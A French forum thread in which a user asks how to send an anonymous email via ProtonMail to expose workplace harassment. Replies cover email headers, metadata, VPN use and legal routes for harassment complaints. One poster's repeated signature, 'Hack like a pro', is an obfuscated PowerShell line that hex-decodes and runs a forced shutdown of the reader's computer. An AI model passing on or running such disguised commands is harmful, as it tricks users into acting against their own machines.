Annonce

Réduire
Aucune annonce.

Sécurité Protonmail

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Sécurité Protonmail

    Bonjour à tous,
    Pour faire cours : J'ai une amie qui boss dans une entreprise ou elle est litéralement harcelée par ses deux boss. Via une personne interposé j'aimerai faire parvenir des infos via mail afin de faire cesser cela rapidement.
    Donc j'ai regardé à droite et à gauche et je n'ai trouvé que la solution Protonmail pour effectuer les envois de mails. Après différents test apparement l'adrese IP n'est pas présente dans le code et aucune traçe ne laisse présumer une faille pour remonter sur mon adresse voir même ma région en France.
    J'aimerais un avis plus pro et technique afin d'être sur de ne pas faire la boulette.
    Pour info j'ai vu Mailtor mais cela semble en mode stop et pour Tutanota c'est très efficace mais vu qu'il faut donner le code en amont c'est pas vraiment pour mon utilisation.
    Merci d'avance

  • #2
    Quand bien même l'IP serait affichée, elle ne permet pas de remonter à une personne physique sans que cela ne passe par une plainte préalable. (Alors, et seulement dans ce cas, les autorités peuvent faire une réquisition auprès du FAI). Par conséquent, n'importe quel hébergeur préservera ton anonymat, tant que tu restes dans la légalité.
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Il n'ai pas question de mail frauduleux ou tout autre mail hors loi rien de cela il n'y aura pas de plainte possible, je veux juste être sur que personne "informaticien de l'entreprise par exemple" ne puisse soupçonner la région de la provenance du mail car cela serait trop facile de remonter vers la personne.
      Pour ma part mon IP ma ramenner en 2 secondes à 1 village de chez moi donc pour l'entreprise la personne est trouvé vis-à-vis de la seule adresse proche du salarié. L'effet boule de neige qui en découlerais serait énorme.
      Dernière modification par zazen, 19 mai 2017, 05h56.

      Commentaire


      • #4
        Déjà, rien qu'avec gmail en tant qu’expéditeur, le champ "X-Originating-IP" n'est pas présent dans le header du mail. Les seules IP que tu verras seront : celle du serveur du destinataire, et celle des serveurs gmail pour l’expéditeur.

        Pour Protonmail c'est pareil : l’expéditeur sera vu comme les serveurs de protonmail, basés en suisse
        x-sender="[email protected]";
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Envoyé par Krisscool Voir le message
          Quand bien même l'IP serait affichée, elle ne permet pas de remonter à une personne physique sans que cela ne passe par une plainte préalable. (Alors, et seulement dans ce cas, les autorités peuvent faire une réquisition auprès du FAI). Par conséquent, n'importe quel hébergeur préservera ton anonymat, tant que tu restes dans la légalité.
          L'intérêt d'une IP c'est de remonter à la source, peu importe le FAI si tu utilise pas de services pour "cacher" ton IP, on peut facilement savoir ton adresse approximative. Après tu fais un croisement de donnée, à savoir que l'entreprise en à déjà pas mal sur toi si tu utilise le réseau interne pour te connecter à des réseaux sociaux par exemple.
          Parfois même tu peux avoir une adresse IP locale dans les Meta data du mail donc détrompe toi Kriss

          J'ai fais quelques recherches sur ProtonMail, ce qui en ressort c'est que le chiffrement n'est pas fait bout à bout, ce qui signifie qu'un MITM permet de récupérer l'intégralité du contenue du mail. D'autre part il est sauvegardé sur un serveur ce qui signifie que le propriétaire du serveur a accès au mail en clair.

          ProtonMail est pas terrible niveau metadata;
          1. Who you’ve been writing to
          2. Email subject
          3. When the message was sent
          4. Message size
          5. Frequency of exchanges
          6. (Optionally) From which IP

          Mais si tu dit que tes test sont concluant je veux bien le croire.

          Un des liens avec pas mal d'info https://arno0x0x.wordpress.com/2015/...on-protonmail/

          J'ai trouvé quelque chose d'intéressant que je te laisserai creuser https://www.parlonsgeek.com/alternatives-de-tormail/
          Tu as pas mal de solutions mails dont à priori certaines prometteuse.

          Bon courage à toi
          Dernière modification par Ephemeral25, 19 mai 2017, 19h40.
          "la Connaissance pour un éveil de la Conscience"

          Commentaire


          • #6
            Bah perso les services de géoloc me voient à Paris, à plus de 500 bornes de chez moi. (sortie du nœud opérateur, tout dépend de là ou tu sors sur l'internet publique) et je suis loin d'être une exception. Ville, ou ville voisine je veux bien, mais adresse précise, faut pas déconner

            Parfois même tu peux avoir un numéro de téléphone et une adresse IP locale dans les Meta data du mail donc détrompe toi Kriss
            Numéro de tel ? je veux bien me détromper, mais va me falloir tes sources / exemples comme on dit : POC || GTFO.

            Si l'ami Zazen n'a que sa position géographique à cacher Un Protonmail fera bien le taff.
            Hack like a pro :
            PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

            Commentaire


            • #7
              faut se calmer, j'essaye juste d'aider zazen... Je prends l'option GTFO. Bon courage à vous

              EDIT1: J'ai édité mon premier message.
              Dernière modification par Ephemeral25, 19 mai 2017, 19h44.
              "la Connaissance pour un éveil de la Conscience"

              Commentaire


              • #8
                Désolé d'avoir pu laisser penser que je n'étais pas "calme".

                Juste qu'il me semble important de ne pas communiquer d'informations, au mieux infondées, au pire fausses. Je me permet juste de remettre des trucs en question, c'est comme ça qu'on avance non ?

                zazen : Envoi un mail depuis gmail / protonmail ou n'importe quel serveur de messagerie hébergé loin de chez toi qui ne communique pas le "X-Originating-IP" dans le header et ton anonymat sera préservé du moment qu'aucune plainte officielle n'est déposé par le destinataire.
                Hack like a pro :
                PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                Commentaire


                • #9
                  zazen
                  Il y a deux vues selon moi à ton problème:

                  La première la personne harcelée: Le meilleur moyen de faire cesser cela c'est de porter plainte. Il n'y a pas 36 façons de le faire et si je suppute tes intentions, sache que l'intimidation ou le chantage sont condamnés aussi fortement que le harcèlement.

                  Enfin, Si tu veux faire transiter des mails, le plus simple c'est les boites mails temporaires, tu t'y connectes via une VM sous VPN, tu envoies ton mail et tu supprimes la VM.
                  Writer, Cyber Security Enthusiast! Follow me on Twitter: @SwitHak

                  Commentaire


                  • #10
                    Merci beaucoup pour toutes les informations données ci-dessus, si en effectuant un envois de mail via Gmail ou Prontonmail depuis un autre secteur géographique je serais tranquille.
                    L'OMBRE

                    Je ne veux en aucun cas effectuer une démarche de délation ou chantage et surtout pas porter plainte car cela retomberais aussitôt sur mon amie. Je veux juste aiguiller certaines personnes afin que les réponses à leurs questions et cela depuis plusieurs années soient données. Cela libéra environ 150 salariés et mon amie de l'emprise d'un incompétent radin, sexiste, voleur qui prends un malin plaisir à faire pleurer les femmes pendant des séminaire...
                    A un moment donné il faut agir, mais agir tout en restant dans le droit.

                    Je vous remercie encore pour les infos

                    Commentaire


                    • #11
                      "Hors-sujet" :

                      Voilà les personnes dont c'est le boulot, normalement :
                      • Le syndicat, de par sa mission fondamentale et “naturelle” de défense des intérêts matériels et moraux (11) des travailleurs est à même de prendre toute initiative, en tout premier lieu de faire respecter à l’employeur ses obligations.
                      • les délégués du personnel, comme porte-parole des travailleurs peuvent utiliser utilement le droit d’alerte (12) qui précise que : “si un DP constate, notamment par l intermédiaire d’un salarié, qu’il existe une atteinte aux droits des personnes ou aux libertés individuelles dans l’entreprise qui ne soit pas justifié par la nature de la tâche à accomplir, ni proportionné au but recherché, il en saisit immédiatement l’employeur. L’employeur ou son représentant est tenu de procéder sans délai à une enquête avec le délégué et prendre les dispositions nécessaires pour remédier à cette situation” (…) Le droit est le corollaire de l’article L. 102-2…. Nul ne peut…
                      • le CHSCT (13) dont la mission est de “contribuer à la protection de la santé et de la sécurité des salariés (…) ainsi qu’à l’amélioration des conditions de travail (…). Il procède à l’analyse des risques professionnels auxquels peuvent être exposés les salariés, ainsi qu’à l’analyse des conditions de travail”.
                      (...)
                      Par ailleurs, le CHSCT peut utiliser l’expertise (Art. L. 236-9) pour aider à rendre intelligible une situation de harcèlement moral.
                      L'infraction que représente le harcèlement moral au travail est bien mieux prit en compte (et prit en charge) qu'il y a 15-20 ans (médiatisation, burnout, tout ça).

                      La peur de porter plainte, née de la peur des représailles, ne doit pas empêcher ton amie d'entreprendre une action en justice. Ça demandera du courage, mais je pense que c'est le prix à payer pour faire cesser cette situation durablement. Si cela concerne 150 salariés, ça aura encore plus de poids.
                      Hack like a pro :
                      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                      Commentaire

                      Chargement...
                      X